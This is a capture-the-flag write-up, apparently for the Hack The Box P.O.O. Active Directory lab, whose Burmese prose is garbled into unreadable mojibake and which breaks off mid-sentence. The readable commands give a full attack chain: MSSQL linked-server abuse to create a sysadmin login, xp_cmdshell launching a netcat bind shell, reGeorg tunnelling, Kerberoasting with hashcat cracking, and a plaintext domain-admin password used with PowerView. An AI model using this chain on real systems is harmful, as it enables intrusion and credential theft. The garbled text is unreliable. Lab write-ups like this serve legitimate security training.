á€áá±á¬ááºážáá«ážááœááºá áá»áœááºá¯ááºááá¯á·ááẠá
ááºáá
áºáá¯áá¬áá ááá¯ááºá០áá¬ááºááœá²áááºážá¡áá±ážá
á¬ážáá
áºáá¯áá¯á¶ážá áááºážááŒá±á¬ááºážááᯠááá¯ááºážááŒá¬ážá
áááºááŒá¬áá«áááºá
áá±á¬áºááŒáá»ááºááœááºáá±á¬áºááŒáá¬ážááá·áºá¡ááá¯ááºáž POO ááẠáá±ážáááºáá±á¬ Active Directory áááºáááºážáá»ááºááœáẠááá¯ááºááá¯ááºááŸá¯á¡ááá·áºá¡á¬ážáá¯á¶ážááœáẠá áœááºážáááºáá»á¬ážááᯠá ááºážáááºááẠáá®ááá¯ááºážáá¯ááºáá¬ážáááºá áááºááŸááºážáá»ááºááŸá¬ áááŸáááá¯ááºáá±á¬ host ááᯠá¡áá»áŸá±á¬á·á¡áááºážáá¯ááºáááºá á¡ááœáá·áºáá°ážáá»á¬ážááᯠááá¯ážááŒáŸáá·áºáááºááŸáá·áº áá¯ááºáááºážá ááºááœáẠá¡áᶠ5 áá¯ááᯠá á¯áá±á¬ááºážááŒááºážááŒáá·áº ááá¯ááááºážáá áºáá¯áá¯á¶ážááᯠáá±á¬ááºáá¯á¶ážááœáẠá¡áá±ážá¡áá°áá¯ááºáááºááŒá áºáááºá
áá¬ááºááœá²áááºážááá¯á·áá»áááºáááºááŸá¯ááẠVPN ááŸáááá·áºááŒá áºáááºá ááááºážá¡áá»ááºá¡áááºáá¯á¶ááŒá¯á¶áá±ážááŸáá·áºáááºáááºáá±á¬ áá áºá á¯á¶áá áºáá¬ááᯠááááŸááá°áá»á¬ážááŸáá·áº áá»áŸáá¯á·ááŸááºááœááºáááºááá¯á· áááºáááºáá±á¬ááºáá¬áá±á¬ááŒá±á¬áá·áº ááá·áºá¡ááœáẠá¡áá±ážááŒá®ážáá±á¬áá±áá¬áá»á¬ážááŸáááá·áº ááœááºáá»á°áá¬á០ááá¯á·ááá¯áẠááá·áºá¡ááœáẠá¡áá±ážááŒá®ážáá±á¬áá±áá¬áá»á¬ážááŸáááá·áº áá±áá¬á០áá»áááºáááºááŒááºážáááŒá¯ááẠá¡ááŒá¶ááŒá¯ááá¯áá«áááºá
á¡ááœá²á·á¡á
ááºážááá¯ááºáá¬á¡áá»ááºá¡áááºáá»á¬áž
áá±á¬ááºážáá«ážá¡áá
áºáá»á¬ážá áá±á¬á·ááºáá²ááºááŸáá·áº á¡ááŒá¬ážá¡áá»ááºá¡áááºáá»á¬ážá¡ááŒá±á¬ááºáž áááºááááŸáááá¯ááºá
á±áááºá¡ááœáẠáá»áœááºá¯ááºáááºáá®ážáá²á·áááºá
á¡áá»ááºá¡áááºá¡á¬ážáá¯á¶ážááᯠááá¬áá±ážááá¯ááºáᬠáááºááœááºáá»ááºá¡ááœááºáᬠáá¶á·ááá¯ážáá±ážáá«áááºá á€á
á¬áááºážááᯠáá±ážáá¬ážáá°ááẠá€á
á¬áááºážááᯠáá±á·áá¬ááŒááºážááŒá±á¬áá·áº áááŸááá±á¬ á¡ááááá¬ááŸáá·áº áááºážáááºážáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯ááŒááºážááŒá±á¬áá·áº áááºáá°á·ááá¯áá»áŸ ááááá¯ááºáá
áºáá¬ááŸá¯áá»á¬ážá¡ááœáẠáá¬áááºáááŸááᯠáá°ááá«áááºá
ááááºáááºááŒááºáž
á€áá±á¬ááºáá¯á¶ážááááºážááœáẠá ááºááŸá áºáá¯áá«áááºááŒá®áž á¡áᶠ5 áá¯áá«ááŸááááºá
áááŸáááá¯ááºáá±á¬ host á áá±á¬áºááŒáá»ááºááŸáá·áº ááááºá
á¬ááá¯áááºáž áá±ážáá¬ážáá«áááºá
á
áááºááŒá
áá¯á·!
Recon á¡áá¶
áá®á
ááºááŸá¬ /etc/hosts ááŸá¬ ááá·áºáá¬ážáá²á· IP ááááºá
ᬠ10.13.38.11 ááŸááááºá
10.13.38.11 poo.htb
áááá¡ááá·áºááŸá¬ open ports áá»á¬ážááᯠscan áááºáááºááŒá áºáááºá nmap ááŒáá·áº port á¡á¬ážáá¯á¶ážááᯠscan áá¯ááºááẠá¡áá»áááºá¡áá±á¬áºááŒá¬áá±á¬ááŒá±á¬áá·áº áááºážááᯠmasscan ááŒáá·áº á¡áááºáá¯ááºáá«áááºá áá»áœááºá¯ááºááá¯á·ááẠ0pps ááŒáá·áº tun500 interface á០TCP ááŸáá·áº UDP port á¡á¬ážáá¯á¶ážááᯠá áááºááºáááºáá«áááºá
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
ááá¯á ááááºáááºážáá»á¬ážáá±á«áºááœááºáááºáááºáá±á¬áááºáá±á¬ááºááŸá¯áá»á¬ážá¡ááŒá±á¬ááºážá¡áá±ážá
áááºá¡áá»ááºá¡áááºáá»á¬ážááá¯ááá°ááẠ-A ááœá±ážáá»ááºááŸá¯ááŒáá·áºá
áááºááºáá
áºáá¯ááá¯áá¯ááºáá±á¬ááºááŒáá«á
áá¯á·á
nmap -A poo.htb -p80,1433
ááá¯á·ááŒá±á¬áá·áº áá»áœááºá¯ááºááá¯á·ááœáẠIIS ááŸáá·áº MSSQL áááºáá±á¬ááºááŸá¯áá»á¬ážááŸááááºá á€ááá
á¹á
ááœááºá áá»áœááºá¯ááºááá¯á·ááẠááá¯ááááºážááŸáá·áº ááœááºáá»á°áá¬á á
á
áºááŸááºáá±á¬ DNS á¡áááºááᯠááŸá¬ááœá±áá«áááºá áááºáá¬áá¬ááœááºá áá»áœááºá¯ááºááá¯á·á¡á¬áž IIS áááºáá
á¬áá»ááºááŸá¬á០ááŒáá¯ááá¯áá«áááºá
áááºážááœáŸááºáá»á¬ážááᯠáááºáá«ááá²áá² ááŒáá·áºáá¡á±á¬ááºá áá®á¡ááœáẠáá« gobuster áá¯á¶ážáááºá ááá·áºáááºáá±á¬ááºáá»á¬ážááœáẠáá»áœááºá¯ááºááá¯á·á
áááºáááºá
á¬ážáá±á¬ 128 (-t)á URL (-u)á á¡áááá¬áẠ(-w) ááŸáá·áº (-x) ááá¯á·ááᯠáá»áœááºá¯ááºááá¯á·á
áááºáááºá
á¬ážáá±á¬ ááá¯ááºážáá»á¬ážáá¶áá«ááºáá»á¬ážááᯠáááºááŸááºáá±ážáá«áááºá
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
ááá¯á·ááŒá±á¬áá·áºá áá»áœááºá¯ááºááá¯á·ááœáẠ/admin directory á¡ááœáẠHTTP á
á
áºááŸááºááŒá±á¬ááºážá¡áá±á¬ááºá¡áá¬ážááŒááŒááºážá¡ááŒáẠ.DS_Store desktop áááºáá±á¬ááºááŸá¯ááá¯ááŸá±á¬ááºááŸá¯ááá¯ááºááᯠáááŸáááá¯ááºáá«áááºá .DS_Store ááẠááá¯ááºá
á¬áááºážá á¡áá¯ááºááœááºáááºáá±áá¬á ááœá±ážáá»ááºáá¬ážáá±á¬ áá±á¬ááºáá¶áá¯á¶áá²á·ááá¯á·áá±á¬ ááá¯ááºááœá²áá
áºáá¯á¡ááœáẠá¡áá¯á¶ážááŒá¯áá°áááºáááºáá»á¬ážááᯠááááºážáááºážáá¬ážááá·áº ááá¯ááºáá»á¬ážááŒá
áºáááºá ááá¯áá²á·ááá¯á·áá±á¬ááá¯ááºááẠáááºáá±á¬á·ááºáá²áá±ážáá¬ážáá°áá»á¬ážá áááºáá¬áá¬áááºážááœáŸááºááœáẠá¡áá¯á¶ážáááºááá¯ááºáááºá ááá¯á·ááŒá±á¬áá·áºá áá»áœááºá¯ááºááá¯á·ááẠáááºážááœáŸááºá á¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááŸáá·áº áááºáááºáá±á¬ á¡áá»ááºá¡áááºáá»á¬ážááᯠáááŸááá«áááºá áá®á¡ááœáẠáááºáá¯á¶ážááá¯ááºáá«áááºá
python3 dsstore_crawler.py -i http://poo.htb/
áááºážááœáŸááºá á¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááᯠáá»áœááºá¯ááºááá¯á· áááŸááá«áááºá á€áá±áá¬ááœáẠá
áááºáááºá
á¬ážá
áá¬á¡áá±á¬ááºážáá¯á¶ážááŸá¬ /dev directory ááẠá¡ááá¯ááºážá¡áááºááŸá
áºáá¯ááœáẠá¡áááºážá¡ááŒá
áºáá»á¬ážááŸáá·áº db ááá¯ááºáá»á¬ážááᯠááŒááºááœá±á·ááá¯ááºááẠá ááá¯á·áá±á¬áº áááºáá±á¬ááºááŸá¯ááẠIIS ShortName ááœáẠá¡á¬ážáááºážáá±áá«á ááá¯ááºááŸáá·áº áááºážááœáŸááºá¡áááºáá»á¬ážá áááá
á¬áá¯á¶áž 6 áá¯á¶ážááᯠá¡áá¯á¶ážááŒá¯ááá¯ááºáá«áááºá á€á¡á¬ážáááºážáá»ááºááᯠá¡áá¯á¶ážááŒá¯á á
á
áºáá±ážááá¯ááºáá«áááºá
ááŒá®ážáá±á¬á· "poo_co" áá²á·á
áá²á· á
á¬áá¬ážááá¯ááºáá
áºáá¯ááᯠáá«ááá¯á·ááœá±á·áááºá áá¬áááºáá¯ááºáááŸááºážááááá²á "co" áá²á· á¡á
ááŒá¯áá²á· á
áá¬ážáá¯á¶ážá¡á¬ážáá¯á¶ážááᯠá¡áááá¬ááºá¡áááá¬ááºááá±áá² ááœá±ážááá¯ááºáááºá
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
wfuzz ááŒáá·áº áááºááŒá±á¬áá«á
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
ááŸááºáááºáá±á¬á
áá¬ážáá¯á¶ážááá¯ááŸá¬áá«á áá»áœááºá¯ááºááá¯á·ááẠá€ááá¯ááºááá¯ááŒáá·áºáááºá á¡áá±á¬ááºá¡áá¬ážáá»á¬ážááᯠááááºážáááºážááẠ(DBNAME ááá·áºáááºáá»ááºááŒáá·áº áá¯á¶ážááŒááºáááºá áááºážááá¯á·ááẠMSSQL ááŸááŒá
áºáááº)á
áá»áœááºáá±á¬áºááá¯á· á¡áá¶ááᯠááœáŸá²ááŒá®áž 20% áááºáá¬áááºá
áááºá¡áá¶
MSSQL áá²á· áá»áááºáááºááŒá®áž DBeaver ááᯠáá¯á¶ážáá«áááºá
áá®áá±áá¬áá±á·á
áºááŸá¬ á
áááºáááºá
á¬ážá
áᬠáá¬ááŸáááœá±á·áá«áá°ážá SQL Editor áá
áºáá¯áááºáá®ážááŒá®áž á¡áá¯á¶ážááŒá¯áá°ááœá±áá¬ááœá±áá²ááá¯áᬠá
á
áºáá±ážááŒáá·áºáá¡á±á¬ááºá
SELECT name FROM master..syslogins;
áá»áœááºá¯ááºááá¯á·ááœáẠá¡áá¯á¶ážááŒá¯áá° ááŸá
áºáŠážááŸááááºá áá»áœááºá¯ááºááá¯á·áá¡ááœáá·áºá¡áá±ážáá»á¬ážááᯠá
á
áºáá±ážááŒáá·áºááŒáá«á
áá¯á·á
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
ááá¯á·ááŒá±á¬áá·áº á¡ááœáá·áºáá°ážáá»á¬áž áááŸááá«á ááá·áºááºáá»áááºáá¬ážáá²á· áá¬áá¬ááœá±ááᯠááŒáá·áºáá¡á±á¬ááºá áá®áááºážááá¬á¡ááŒá±á¬ááºáž á¡áá±ážá
áááºáá±ážáá¬ážáá«áááºá
SELECT * FROM master..sysservers;
áá«ááŒá±á¬áá·áº áá±á¬ááºááẠSQL Server ááᯠááŸá¬ááœá±á·áá«áááºá openquery() ááᯠá¡áá¯á¶ážááŒá¯á á€áá¬áá¬ááŸá command áá»á¬ážááá¯ááºáá±á¬ááºááŸá¯ááᯠá
á
áºáá±ážááŒáá«á
áá¯á·
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
ááŒá®ážáá±á¬á· query tree áááºážáá±á¬ááºááá¯á·ááááºá
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
á¡ááŸááºááŸá¬ áá»áœááºá¯ááºááá¯á·ááẠáá»áááºáááºáá¬ážáá±á¬áá¬áá¬ááá¯á· áá±á¬ááºážááá¯áá»ááºáá áºáá¯ááŒá¯áá¯ááºáá±á¬á¡áá«á áá±á¬ááºážááá¯áá»ááºááᯠá¡ááŒá¬ážá¡áá¯á¶ážááŒá¯áá°á áááºá ááºááŸá¯ááœáẠáá¯ááºáá±á¬ááºáá«áááºá ááá·áºááºáá»áááºáá¬ážáá±á¬áá¬áá¬ááœáẠáá»áœááºá¯ááºááá¯á·áá¯ááºáá±á¬ááºáá±ááá·áº áá¯á¶ážá áœá²áá°áá¡ááŒá±á¬ááºážá¡áá¬ááᯠááŒáá·áºááŒáá«á áá¯á·á
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
ááᯠáá»áœááºá¯ááºááá¯á·ááŸáá·áº áá»áááºáááºáá¬ážáá±á¬ áá¬áá¬á០áá±á¬ááºážááá¯áá»ááºá¡á¬áž áááºááá·áºá¡ááŒá±á¡áá±ááœáẠáá¯ááºáá±á¬ááºáá¬ážáááºááᯠááŒáá·áºááŒáá«á
áá¯á·á
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
ááá¯á·ááŒá±á¬áá·áºá áááºážááẠá¡ááœáá·áºáá°ážáá»á¬ážá¡á¬ážáá¯á¶ážááŸááááá·áº DBO á¡ááŒá±á¬ááºážá¡áá¬áá
áºáá¯ááŒá
áºáááºá ááá·áºááºáá»áááºáá¬ážáá±á¬áá¬áá¬á០áá±á¬ááºážááá¯ááŸá¯áá
áºáá¯á¡ááœáẠá¡ááœáá·áºáá°ážáá»á¬ážááᯠá
á
áºáá±ážááŒáá«á
áá¯á·á
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
áááºááœá±á·ááŒááºáááá·áºá¡ááá¯ááºáž áá»áœááºá¯ááºááá¯á·ááœáẠá¡ááœáá·áºáá°ážáá»á¬ážá¡á¬ážáá¯á¶ážááŸááááºá áá«ááá¯á·áá²á· á¡ááºááºáááºááᯠáá®ááá¯áááºáá®ážááá¯ááºááŒáá¡á±á¬ááºá áá«áá±ááá·áº áá°ááá¯á·á áá°ááá¯á·ááᯠopenquery ááá± ááœáá·áºáááŒá¯áá°ážá EXECUTE AT áá²á· áá¯ááºááŒáá·áºáá¡á±á¬ááºá
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
ááᯠáá»áœááºá¯ááºááá¯á·ááẠá¡áá¯á¶ážááŒá¯áá°á¡áá áºá á¡áá±á¬ááºá¡áá¬ážáá»á¬ážááŸáá·áº áá»áááºáááºááŒá®áž á¡áá¶áá±áá¬áá±á·á áºá¡áá áºááᯠááŒáá·áºááŸá¯áá±á·áá¬áá«á
áá«ááá¯á· áá®á¡áá¶ááᯠááœáŸá²ááŒá®áž ááŸá±á·áááºááœá¬ážáááºá
áá±á¬ááºáá¶á¡áá¶
MSSQL ááá¯á¡áá¯á¶ážááŒá¯á shell ááá¯ááá°ááŒáá«á áá¯á·á áá»áœááºá¯ááºááẠimpacket package á០mssqlclient ááá¯á¡áá¯á¶ážááŒá¯áá±áá«áááºá
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
á
áá¬ážááŸááºáá»á¬ážááá°ááẠááá¯á¡ááºááŒá®áž áá»áœááºá¯ááºááá¯á· ááááá¯á¶ážááœá±á·áá°ážááá·áºá¡áá¬ááŸá¬ ááá¯ááºááŒá
áºáááºá ááá¯á·ááŒá±á¬áá·áºá áá»áœááºá¯ááºááá¯á·ááẠáááºáá¬áᬠconfig áá
áºáᯠááá¯á¡ááºááẠ(áá»áœááºá¯ááºááá¯á· á¡áááºááŒá±áá±á¬ shell ááᯠáá
áºááá¬ážááá¯ááºáá±á¬ááŒá±á¬áá·áº firewall á¡áá¯ááºáá¯ááºáá¯á¶ááááº)á
ááá¯á·áá±á¬áº áááºáá±á¬ááºááœáá·áºááᯠááŒááºážáááºáá¬ážáááºá áá»áœááºá¯ááºááá¯á·ááẠMSSQL ááŸááá¯ááºááá¯áááºááŸá¯ááá¯ááºáá±á¬áºáááºážá áá»áœááºá¯ááºááá¯á·áááºáááºááá·áºáááá¯ááááºážáááºážáá¬áá¬á
áá¬ážáá»á¬ážááᯠconfigure áá¯ááºáá¬ážáááºááá¯áááááºááá¯á¡ááºáááºá ááŒá®ážáá±á¬á· MSSQL directory ááŸá¬ Python ááŸááááºááá¯áᬠááááá¯ááºááááºá
ááá¯á·áá±á¬áẠweb.config ááá¯ááºááá¯áááºááẠááŒá¿áá¬áááŸááá«á
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
ááœá±á·ááŸááá±á¬á¡áá±á¬ááºá¡áá¬ážáá»á¬ážááŒáá·áº /admin ááá¯á·ááœá¬ážá á¡áá¶ááá¯áá°áá«á
ááŒá±áá¯ááºá¡áá¶
á¡ááŸááºááŸá¬á firewall á¡áá¯á¶ážááŒá¯áá¬ááœáẠá¡áááºáááŒá±ááŸá¯á¡áá»áá¯á·ááŸááá±á¬áºáááºáž ááœááºáááºáááºáááºáá»á¬ážááŸáá áºááá·áº IPv6 áááá¯ááá¯áá±á¬ááᯠá¡áá¯á¶ážááŒá¯áá¬ážáááºááᯠáááááŒá¯áááá«áááºá
á€ááááºá
á¬ááᯠ/etc/hosts ááá¯á·ááá·áºáá«á
dead:babe::1001 poo6.htb
host ááᯠáááºá
áááºááºáááºááŒáá·áºáá¡á±á¬ááºá áá«áá±ááá·áº áá®áá
áºáá« IPv6 áá»á±á¬áºááœá¬ážáá«ááŒá®á
WinRM áááºáá±á¬ááºááŸá¯ááᯠIPv6 áá»á±á¬áºááŒáá·áº áááá¯ááºáá«áááºá ááœá±á·ááŸááá±á¬á¡áá±á¬ááºá¡áá¬ážáá»á¬ážááŸáá·áº áá»áááºáááºááŒáá«á
áá¯á·á
áááºá
áá±á¬á·ááœáẠá¡áá¶áá
áºáᯠáá«áááºááŒá®áž áááºážááᯠáááºááœáŸá²ááá¯ááºáá«á
P00ned á¡áá¶
áááºážáá±á¬ááºááŒá®ážááẠá¡áááºááŸááºááá¯á·áá²á·
setspn.exe -T intranet.poo -Q */*
MSSQL ááŸáááá·áº command ááᯠrun ááŒáá«á
áá¯á·á
á€áááºážá¡á¬ážááŒáá·áºá áá¯á¶ážá
áœá²áá°áá»á¬ážá p00_hr ááŸáá·áº p00_adm ááá¯á·á SPN ááᯠáááŸááááºá ááá¯ááá¯áááºááŸá¬ áááºážááá¯á·ááẠKerberoasting áá²á·ááá¯á·áá±á¬ ááá¯ááºááá¯ááºááŸá¯ááᯠáá¶ááá¯ááºáááºááŸáááá¯ááºáááºáᯠááá¯ááá¯áááºá á¡ááá¯áá»á¯ááºá¡á¬ážááŒáá·áºá áá»áœááºá¯ááºááá¯á·ááẠáááºážááá¯á·á á
áá¬ážááŸááºáá»á¬ážá hashes ááᯠáááá¯ááºáááºá
ááááŠážá
áœá¬ áááºááẠMSSQL á¡áá¯á¶ážááŒá¯áá°ááá¯ááºá
á¬áž áááºááŒáááºáá±á¬ shell ááá¯ááá°ááẠááá¯á¡ááºáááºá ááá¯á·áá±á¬áº áá»áœááºá¯ááºááá¯á·ááẠáááºáá±á¬ááºááœáá·áºááᯠááá·áºáááºáá¬ážáá±á¬ááŒá±á¬áá·áºá áá»áœááºá¯ááºááá¯á·ááẠááááºáááºáž 80 ááŸáá·áº 1433 ááŸáááá·áº host ááŸáá·áºáᬠáá»áááºáááºááŸá¯ááŸááááºá ááá¯á·áá±á¬áº port 80 ááá¯ááŒááºá á¥áááºááá¯ááºáá±á«ááºážá¡ááœá¬ážá¡áá¬ááŒá
áºááá¯ááºáááºá áá®á¡ááœáẠáá»áœááºáá±á¬áºááá¯á· áá¯á¶ážáá«áááºá
ááá¯á·áá±á¬áº áááºážááá¯áááºáá±á¬ááºáááºááŒáá¯ážá
á¬ážáá±á¬á¡áá«ááœáẠ404 error áá
áºáá¯áááŸááááºá ááá¯ááá¯áááºááŸá¬ *.aspx ááá¯ááºáá»á¬ážááᯠáá¯ááºáá±á¬ááºáááºááá¯ááºáá«á á€ááá¯ážáá»á²á·ááŸá¯áá»á¬ážááŒáá·áº ááá¯ááºáá»á¬ážáááºáááºá
á±ááẠASP.NET 4.5 ááᯠá¡á±á¬ááºáá«á¡ááá¯ááºáž ááá·áºááœááºážáá«á
dism /online /enable-feature /all /featurename:IIS-ASPNET45
ááá¯áááºážá tunnel.aspx ááá¯áááºáá±á¬ááºááá·áºá¡áá« á¡áá¬á¡á¬ážáá¯á¶ážááẠá¡áááºááá·áºááŒá
áºááŒá®áᯠáá»áœááºá¯ááºááá¯á·áááŸááá²á·áá«áááºá
á¡ááœá¬ážá¡áá¬ááᯠáááºááá·áºááá¯á·ááá·áº á¡ááá®áá±ážááŸááºážá client á¡ááá¯ááºážááᯠá
áááºááŒáá«á
áá¯á·á áá»áœááºá¯ááºááá¯á·ááẠááááºáááºáž 5432 á០á¡ááœá¬ážá¡áá¬á¡á¬ážáá¯á¶ážááᯠáá¬áá¬ááá¯á· áá±ážááá¯á·áá«áááºá
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
áá»áœááºá¯ááºááá¯á·ááẠáá»áœááºá¯ááºááá¯á·á proxy ááŸáááá·áº áááºááá·áº application áá¡ááœá¬ážá¡áá¬ááá¯áááá¯áá±ážááá¯á·ááẠproxychains ááá¯á¡áá¯á¶ážááŒá¯áá«áááºá á€ááá±á¬ááºá
á®ááᯠ/etc/proxychains.conf ááœá²á·á
ááºážááŸá¯áá¯á¶á
á¶ááá¯ááºááá¯á· ááá·áºááŒáá«á
áá¯á·á
á¡áᯠáááá¯ááááºááᯠáá¬áá¬ááŸá¬ áááºááá¯ááºááŒáá¡á±á¬ááº
ááá¯á MSSQL ááŸáááá·áºá áá»áœááºá¯ááºááá¯á·ááẠáá¬ážáááºáá°ááᯠá
áááºááá¯ááºáá«á
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
áá»áœááºá¯ááºááá¯á·ááẠáá»áœááºá¯ááºááá¯á·á proxy ááŸáááá·áº áá»áááºáááºáá«áááºá
proxychains rlwrap nc poo.htb 4321
ááŒá®ážáá±á¬á· hashes ááœá±ááᯠááá°ááá¯ááºááŒáá¡á±á¬ááºá
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
ááá¯á·áá±á¬ááºá ဠhashes áá»á¬ážááᯠáááºáá±á¬ááºážááẠááá¯á¡ááºáááºá Rockyou ááŸá¬ á
áá¬ážááŸááºáá±áá¬á¡áááá¬ááºáááŸáááá¯á·á Seclists ááŸá¬ áá±ážáá¬ážáá²á· á
áá¬ážááŸááºá¡áááá¬ááºá¡á¬ážáá¯á¶ážááᯠáá»áœááºáá±á¬áºá¡áá¯á¶ážááŒá¯áá²á·áá«áááºá á
á¬áááºážáá±á¬ááºáá°áááºá¡ááœáẠáá»áœááºá¯ááºááá¯á·ááẠhashcat ááá¯á¡áá¯á¶ážááŒá¯áááºá
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
ááŒá®ážáá±á¬á· á áá¬ážááŸááºááŸá áºáá¯áá¯á¶ážááᯠDutch_passwordlist.txt á¡áááá¬ááºááŸá¬ áááá áá¯áááááᯠKeyboard-Combinations.txt ááŸá¬ ááœá±á·áá«áááºá
ááá¯á·ááŒá±á¬áá·áº áá»áœááºá¯ááºááá¯á·ááœáẠá¡áá¯á¶ážááŒá¯áá° áá¯á¶ážáŠážááŸááááºá áá»áœááºá¯ááºááá¯á·ááẠááá¯ááááºážááááºážáá»á¯ááºáááááá¬ááá¯á· ááœá¬ážááŒáááºá áá°á·ááááºá
á¬ááᯠá¡áááºááŸá¬ááŒáá·áºáá¡á±á¬ááºá
áá±á¬ááºážáá«áááºá domain controller áá²á· IP ááááºá
á¬ááᯠáá±á·áá¬ááŒá®ážáá«ááŒá®á ááá¯ááááºážá¡áá¯á¶ážááŒá¯áá°á¡á¬ážáá¯á¶ážá¡ááŒáẠáááºážááá¯á·áá²á០áááºáá°ááẠá
á®áá¶ááá·áºááœá²áá°ááŒá
áºáááºááᯠááŸá¬ááœá±ááŒáá«á
áá¯á·á á¡áá»ááºá¡áááºááá°ááẠáá¬ááºááœáŸááºážááᯠáá±á«ááºážáá¯ááºáá¯ááºááẠPowerView.ps1á ááá¯á·áá±á¬áẠáá»áœááºá¯ááºááá¯á·ááẠááá±á¬ááºážáá±á¬-winrm ááᯠá¡áá¯á¶ážááŒá¯á áááºážááœáŸááºááᯠ-s ááá·áºáááºáá»ááºááŸá áá¬ááºááœáŸááºážááŒáá·áº áááºááŸááºáá±ážáá«áááºá ááŒá®ážá០PowerView script ááá¯áááºááá¯ááºáá«á
ááᯠáá»áœááºá¯ááºááá¯á·ááẠáááºážááá¯ááºáá±á¬ááºáá»ááºá¡á¬ážáá¯á¶ážááᯠá¡áá¯á¶ážááŒá¯ááá¯ááºáá«ááŒá®á p00_adm á¡áá¯á¶ážááŒá¯áá°ááẠá¡ááœáá·áºáá°ážáá¶á¡áá¯á¶ážááŒá¯áá°ááŸáá·áºáá°áááºá ááá¯á·ááŒá±á¬áá·áº áá»áœááºá¯ááºááá¯á·ááẠáááºážáá¡ááŒá±á¡áá±ááœáẠá¡áá¯ááºáá¯ááºáá«áááºá á€á¡áá¯á¶ážááŒá¯áá°á¡ááœáẠPSCredential object áá
áºáá¯ááᯠáááºáá®ážááŒáá«á
áá¯á·á
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
ááᯠáá»áœááºá¯ááºááá¯á· Creds áááºááŸááºááá·áº Powershell á¡áááá·áºá¡á¬ážáá¯á¶ážááᯠp00_adm ááá¯ááºá á¬áž áá¯ááºáá±á¬ááºáá«áááºá á¡áá¯á¶ážááŒá¯áá°áá»á¬ážá á¬áááºážááŸáá·áº AdminCount áááºááœáŸááºážáá»ááºááᯠáá±á¬áºááŒááŒáá«á áá¯á·á
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
ááá¯á·ááŒá±á¬áá·áºá áá»áœááºá¯ááºááá¯á·áá¡áá¯á¶ážááŒá¯áá°ááẠá¡ááŸááºáááẠá¡ááœáá·áºáá°ážáá¶ááŒá
áºáááºá áá°áááºá¡ááœá²á·áá²ááá¯áᬠááŒáá·áºááá¯ááºáá¡á±á¬ááºá
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
á¡áá¯á¶ážááŒá¯áá°ááẠááá¯ááááºážá
á®áá¶ááá·áºááœá²áá°ááŒá
áºááŒá±á¬ááºáž áá±á¬ááºáá¯á¶ážááœáẠáá»áœááºá¯ááºááá¯á· á¡áááºááŒá¯áá«áááºá áááºážááẠááá¯ááááºážááááºážáá»á¯ááºáááááá¬ááá¯á· á¡áá±ážááŸáááºáá±á¬ááºááẠá¡ááœáá·áºá¡áá±ážáá±ážáááºá áá»áœááºá¯ááºááá¯á·á á¥áááºááá¯ááºáá±á«ááºážááᯠá¡áá¯á¶ážááŒá¯á WinRM ááŒáá·áº áááºáá±á¬ááºááẠááŒáá¯ážá
á¬ážááŒáá«á
áá¯á·á evil-winrm ááá¯á¡áá¯á¶ážááŒá¯áá±á¬á¡áá« reGeorg ááŸáá¯ááºáá±ážáá±á¬á¡ááŸá¬ážáá»á¬ážááŒá±á¬áá·áºáá»áœááºá¯ááºá
áááºááŸá¯ááºááœá±ážáá²á·áááºá
áá±á¬ááºáá
áºáá¯á ááá¯ááœááºáá²á·áá
áºáá¯ááᯠáá¯á¶ážáááºá
áá»áœááºáá±á¬áºááá¯á· áá»áááºáááºááá¯á· ááŒáá¯ážá
